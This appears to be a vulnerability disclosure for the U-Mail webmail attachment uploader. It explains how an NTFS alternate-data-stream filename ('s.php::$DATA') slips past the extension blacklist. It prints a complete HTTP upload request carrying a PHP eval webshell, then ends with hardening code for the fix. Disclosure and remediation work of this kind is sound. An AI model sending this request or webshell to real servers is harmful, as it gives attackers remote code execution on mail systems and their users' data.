Another getshell in the U-mail system
Improper handling in one part of the U-Mail system leads to getshell
Version: U-Mail for Windows V9.8.57
Test account: hello0001@fuck.com
Test host: Windows Server 2003 + IIS 6 [the Windows host configuration is the mail system's default configuration]
First, you need to obtain the user's userid, because the cache directory path is umail\WorldClient\html\client\cache\{userid}\
The interface for getting the user ID is:
http://mail.fuck.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=hello0001
The userid is 3.
Upload defect
Vulnerable file: umail\WorldClient\html\client\mail\module\o_attach.php
Code
if (ACTION == "attach-upload-batch" && $_FILES) {
    // one entry per uploaded file; the form field is Filedata[]
    $file_name   = $_FILES['Filedata']['name'];
    $file_type   = $_FILES['Filedata']['type'];
    $file_size   = $_FILES['Filedata']['size'];
    $file_source = $_FILES['Filedata']['tmp_name'];
    $path_target = getusercachepath();   // ...\client\cache\{userid}\
    // blacklist: only these suffixes are rejected
    $not_allow_ext = array("php", "phps", "php3", "exe", "bat");
    $res_data = array();
    foreach ($file_source as $k => $v) {
        $file_id     = makerandomname();
        $file_suffix = getfilenamesuffix($file_name[$k]);   // text after the last "."
        if (in_array($file_suffix, $not_allow_ext)) {
            $res_data[] = array(
                "status"   => "0",
                "message"  => el("file upload with this extension is not supported", ""),
                "filename" => $file_name[$k],
                "filesize" => $file_size[$k],
                "file_id"  => $file_id
            );
        } else {
            // the client-supplied suffix is appended to the target path unchanged
            $file_target = $path_target . $file_id . "." . $file_suffix;
            if (!move_uploaded_file($v, $file_target)) {
                $res_data[] = array(
                    "status"   => "0",
                    "message"  => el("file writing error, contact the administrator!", ""),
                    "filename" => $file_name[$k],
                    "filesize" => $file_size[$k],
                    "file_id"  => $file_id
                );
            } else {
                $res_data[] = array(
                    "status"   => "1",
                    "filename" => trim($file_name[$k]),
                    "filesize" => $file_size[$k],
                    "file_id"  => $file_id
                );
                $_SESSION[SESSION_ID]['attach_cache'][] = array(
                    "id"   => $file_id,
                    "name" => $file_name[$k],
                    "type" => "1",
                    "path" => $file_target,
                    "size" => $file_size[$k]
                );
            }
        }
    }
    dump_json($res_data);
}
PHP files could be uploaded directly in earlier versions. The latest version uses a blacklist: .php files are rejected and the suffix check itself cannot be bypassed. However, the NTFS alternate data stream (ADS) feature gets around the blacklist: the suffix that is checked is "php::$DATA", which is not on the list, while NTFS writes the file to its default stream, i.e. as a plain .php file.
Compose an email, drag and drop an attachment, intercept the request with Burp Suite, and change the file name to s.php::$DATA:
POST /webmail/client/mail/index.php?module=operate&action=attach-upload-batch HTTP/1.1
Host: mail.fuck.com
Proxy-Connection: keep-alive
Content-Length: 233
Origin: http://mail.fuck.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary37jD3r27mTgTBrAh
Accept: */*
Referer: http://mail.fuck.com/webmail/client/mail/index.php?module=view&action=mail-compose
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=3b8305453c65c1039f33832b23268fff

------WebKitFormBoundary37jD3r27mTgTBrAh
Content-Disposition: form-data; name="Filedata[]"; filename="s.php::$DATA"
Content-Type: application/octet-stream

<?php @eval($_POST['a']);?>
------WebKitFormBoundary37jD3r27mTgTBrAh--
The resulting webshell address is http://mail.fuck.com/webmail/client/cache/3/14178435495.php
Solution:
Because the mail system runs PHP under IIS + FastCGI on a Windows host, it is exposed to many problems, such as parsing vulnerabilities. The simplest fix for the upload problem is to store uploaded files in a directory outside the web root.
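As an added example (not U-Mail's own code), this is how the suffix check in o_attach.php could be hardened against the ADS trick: cut the client filename at the first colon before looking at the extension, use an allowlist instead of the blacklist, and write the file under a server-generated name to a directory outside the web root. The helper names safe_upload_name, allowed_extension and store_attachment are assumed.

```php
<?php
// Added example, not U-Mail's code. Helper names are assumed.

// Normalise an uploaded filename before any extension decision.
// On NTFS, "s.php::$DATA" or "s.php:stream" is written as "s.php", so a
// check that only reads the text after the last "." never sees "php".
function safe_upload_name($name) {
    $name = basename(str_replace('\\', '/', $name)); // drop any path part
    // ':' is not valid in a Windows filename; everything from the first
    // colon on is stream syntax, so cut it off here.
    $colon = strpos($name, ':');
    if ($colon !== false) {
        $name = substr($name, 0, $colon);
    }
    // Windows also strips trailing dots and spaces when creating a file.
    return rtrim($name, ". ");
}

// Allowlist instead of blacklist: anything not listed is rejected,
// so new or unexpected executable suffixes are never a special case.
function allowed_extension($name) {
    $allow = array('txt', 'pdf', 'doc', 'docx', 'xls', 'xlsx',
                   'png', 'jpg', 'jpeg', 'gif', 'zip');
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return $ext !== '' && in_array($ext, $allow, true);
}

// Store the upload under a random server-chosen name in $store_dir, which
// must lie outside the web root; attachments are then served only through
// a download script, so a file that slips past the check is still not
// reachable as a URL. Returns the stored path or false on rejection.
function store_attachment($tmp_path, $client_name, $store_dir) {
    $clean = safe_upload_name($client_name);
    if (!allowed_extension($clean)) {
        return false;
    }
    $ext    = strtolower(pathinfo($clean, PATHINFO_EXTENSION));
    $target = rtrim($store_dir, "/\\") . DIRECTORY_SEPARATOR
            . md5(uniqid((string) mt_rand(), true)) . '.' . $ext;
    return move_uploaded_file($tmp_path, $target) ? $target : false;
}

// Constructed input matching the request above: the ADS name is reduced
// to "s.php" and then rejected by the allowlist.
var_dump(allowed_extension(safe_upload_name('s.php::$DATA')));
```

Inside the handler the call would replace the in_array/move_uploaded_file pair with store_attachment($v, $file_name[$k], $store_dir) and record the returned path in the session instead of a cache path under the web root.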